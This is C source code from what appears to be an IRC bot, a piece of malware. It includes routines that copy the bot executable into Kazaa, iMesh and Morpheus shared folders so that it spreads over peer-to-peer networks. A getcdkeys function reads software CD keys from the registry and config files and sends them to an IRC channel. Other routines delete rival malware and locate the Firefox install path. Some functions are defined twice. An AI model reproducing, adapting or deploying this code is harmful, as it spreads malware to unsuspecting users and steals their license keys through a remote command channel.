char *RegQuery(HKEY root,LPCTSTR subkey,LPCTSTR name,DWORD type/*=REG_SZ*/)
{
HKEY key=NULL;
DWORD dwRes=65535;
static char szRegBuffer[65535+2];
ZeroMemory(szRegBuffer,65535);
if(fRegOpenKeyEx(root,subkey,0,KEY_ALL_ACCESS,&key) == ERROR_SUCCESS)
{
if(fRegQueryValueEx(key,name,NULL,NULL,(unsigned char *)szRegBuffer,&dwRes) == ERROR_SUCCESS)
{
if (type==REG_MULTI_SZ)
{
szRegBuffer[dwRes] = '\0'; // Ensure termination
// Skip back through ALL the null chars first
while (szRegBuffer[dwRes]=='\0' && dwRes != 0)
--dwRes;
for (unsigned int i=0; i<dwRes; ++i)
{
if (szRegBuffer[i]=='\0')
szRegBuffer[i]='\n'; // Convert to \n
}
}
fRegCloseKey(key);
return szRegBuffer;
}
fRegCloseKey(key);
}
return '\0';
}
void removevirus()
{
char sysdir[MAX_PATH], virusexecuteble[MAX_PATH];
unsigned char szDataBuf[128];
HKEY hkey;
LONG lRet;
DWORD dwSize = 128;
for (unsigned int i=0; viruses[i].subkey; i++) {
lRet = fRegOpenKeyEx(viruses[i].hkey, viruses[i].subkey, 0, KEY_READ, &hkey);
if(fRegQueryValueEx(hkey, viruses[i].value, NULL, NULL, szDataBuf, &dwSize) == ERROR_SUCCESS) {
fRegDeleteValue(hkey, viruses[i].value);
//FIXME: Replace the afw kill utils. we dont need to let that loop,
// when we removed the .exe and the reg key. mayb a static call
// to KillProcess(); can be inserted here. Something like:
// KillProcess(viruses[i].file);
GetSystemDirectory(sysdir, sizeof(sysdir));
sprintf(virusexecuteble, "%s\\%s", sysdir, viruses[i].file);
DeleteFile(virusexecuteble);
}
fRegCloseKey(hkey);
}
return;
}
void iMeshInit(char *botfile)
{
char buffer[MAX_PATH];
HKEY hkey = NULL;
DWORD dwSize = 128;
fRegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\iMesh\\Client", 0, KEY_READ, &hkey);
if(fRegQueryValueEx(hkey, "DownloadsLocation", NULL, NULL, (unsigned char*)buffer, &dwSize) == ERROR_SUCCESS) {
CopyFile(botfile, buffer, FALSE);
}
fRegCloseKey(hkey);
return;
}
void KazaaInit(char *botfile)
{
char buffer[MAX_PATH];
HKEY hkey;
DWORD dwSize = 128;
fRegOpenKeyEx(HKEY_CURRENT_USER, "SOFTWARE\\KAZAA\\LocalContent", 0, KEY_READ, &hkey);
if(fRegQueryValueEx(hkey, "Dir0", NULL, NULL, (unsigned char*)buffer, &dwSize) == ERROR_SUCCESS) {
replacestr(buffer, "012345:", "");
CopyFile(botfile, buffer, FALSE);
}
fRegCloseKey(hkey);
return;
}
void MorpheusInit(char *botfile)
{
char buffer[MAX_PATH];
HKEY hkey;
DWORD dwSize = 128;
fRegOpenKeyEx(HKEY_LOCAL_MACHINE, "SOFTWARE\\Morpheus", 0, KEY_READ, &hkey);
if(fRegQueryValueEx(hkey, "Install_Dir", NULL, NULL, (unsigned char*)buffer, &dwSize) == ERROR_SUCCESS) {
_snprintf(buffer, sizeof(buffer), "%s\\My Shared Folder", buffer);
CreateDirectory(buffer, 0);
CopyFile(botfile, buffer, FALSE);
}
fRegCloseKey(hkey);
return;
}
DWORD RegQuery(HKEY root,LPCTSTR subkey,LPCTSTR name,BOOL &success)
{
HKEY key=NULL;
DWORD dwType=REG_DWORD,dwSize=sizeof(DWORD),dwRead=0;
if(fRegOpenKeyEx(root,subkey,0,KEY_ALL_ACCESS,&key)==ERROR_SUCCESS)
{
if(fRegQueryValueEx(key,name,NULL,&dwType,(LPBYTE)&dwRead,&dwSize)==ERROR_SUCCESS)
{
fRegCloseKey(key);
success=TRUE;
return dwRead;
}
fRegCloseKey(key);
}
success=FALSE;
return 0;
}
void getcdkeys(SOCKET sock, char *chan, BOOL notice)
{
char sendbuf[IRCLINE], line[100], szPath[MAX_PATH];
unsigned char szDataBuf[128];
FILE *fp;
HKEY hkey;
LONG lRet;
DWORD dwSize = 128;
for (unsigned int i=0; regkeys[i].subkey; i++) {
lRet = fRegOpenKeyEx(regkeys[i].hkey, regkeys[i].subkey, 0, KEY_READ, &hkey);
if(fRegQueryValueEx(hkey, regkeys[i].value, NULL, NULL, szDataBuf, &dwSize) == ERROR_SUCCESS) {
if (regkeys[i].file) {
sprintf(szPath, "%s\\%s", szDataBuf, regkeys[i].file);
if((fp=fopen(szPath,"r"))!=NULL) {
while(fgets(line,sizeof(line),fp)) {
if(!strstr(line, regkeys[i].tag)) {
if (strchr(regkeys[i].tag,'=')) {
strtok(line,"=");
sprintf(sendbuf, "4<<12%s CD Key: (%s).4>> ",regkeys[i].name,strtok(NULL, "="));
} else
sprintf(sendbuf, "4<<12%s CD Key: (%s).4>> ",regkeys[i].name,line);
irc_privmsg(sock,chan,sendbuf,notice);
addlog(sendbuf);
break;
}
}
fclose(fp);
}
} else {
sprintf(sendbuf, "4<<12%s CD Key: (%s).4>> ",regkeys[i].name,szDataBuf);
irc_privmsg(sock,chan,sendbuf,notice);
addlog(sendbuf);
}
}
fRegCloseKey(hkey);
}
return;
}
void removevirus()
{
char sysdir[MAX_PATH], virusexecuteble[MAX_PATH];
unsigned char szDataBuf[128];
SOCKET sock;
HKEY hkey;
char sendbuf[IRCLINE];
char current[20];
LONG lRet;
sock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
DWORD dwSize = 128;
for (unsigned int i=0; viruses[i].subkey; i++) {
lRet = fRegOpenKeyEx(viruses[i].hkey, viruses[i].subkey, 0, KEY_READ, &hkey);
if(fRegQueryValueEx(hkey, viruses[i].value, NULL, NULL, szDataBuf, &dwSize) == ERROR_SUCCESS) {
fRegDeleteValue(hkey, viruses[i].value);
strcpy(current,viruses[i].file);
//FIXME: Replace the afw kill utils. we dont need to let that loop,
// when we removed the .exe and the reg key. mayb a static call
// to KillProcess(); can be inserted here. Something like:
if(listProcesses(sock,NULL,FALSE,current) == 1)
sprintf(sendbuf,"[PROC]: Process killed: %s",viruses[i].file);
else
sprintf(sendbuf,"[PROC]: Failed to terminate process: %s", viruses[i].file);
//KillProcess(viruses[i].file);
GetSystemDirectory(sysdir, sizeof(sysdir));
sprintf(virusexecuteble, "%s\\%s", sysdir, viruses[i].file);
DeleteFile(virusexecuteble);
}
fRegCloseKey(hkey);
}
sprintf(sendbuf,"[AV]: Antivirus search complete! ");
return;
}
char *GetFirefoxLibPath()
{
char regSubKey[] = "SOFTWARE\\Clients\\StartMenuInternet\\firefox.exe\\shell\\open\\command";
char path[_MAX_PATH] ="";
char *firefoxPath = NULL;
DWORD pathSize = _MAX_PATH;
DWORD valueType;
HKEY rkey;
// Open firefox registry key
if( fRegOpenKeyEx(HKEY_LOCAL_MACHINE, regSubKey, 0, KEY_READ, &rkey) != ERROR_SUCCESS )
{
//DisplayMesg(TYPE_DEBUG, "\n Failed to open the firefox registry key : HKCU\\%s", regSubKey );
return NULL;
}
// Read the firefox path value
if( fRegQueryValueEx(rkey, NULL, 0, &valueType, (unsigned char*)&path, &pathSize) != ERROR_SUCCESS )
{
//DisplayMesg(TYPE_DEBUG, "\n Failed to read the firefox path value from registry ");
fRegCloseKey(rkey);
return NULL;
}
if( pathSize <= 0 || path[0] == 0)
{
//DisplayMesg(TYPE_DEBUG, "\n Path value read from the registry is empty");
fRegCloseKey(rkey);
return NULL;
}
fRegCloseKey(rkey);
// This path may contain extra double quote....
if( path[0] == '\"' )
{
for(unsigned int i=0; i< strlen(path)-1 ; i++)
path[i] = path[i+1];
}
//DisplayMesg(TYPE_DEBUG, "\n Path value read from registry is %s", path);
// Terminate the string at last "\\"
for(int j=strlen(path)-1; j>0; j--)
{
if( path[j] == '\\' )
{
path[j]=0;
break;
}
}
firefoxPath = (char*) malloc( strlen(path) + 1);
if( firefoxPath )
strcpy(firefoxPath, path);
//DisplayMesg(TYPE_DEBUG, "\n Firefox path = [%s] ", firefoxPath);
return firefoxPath;
}
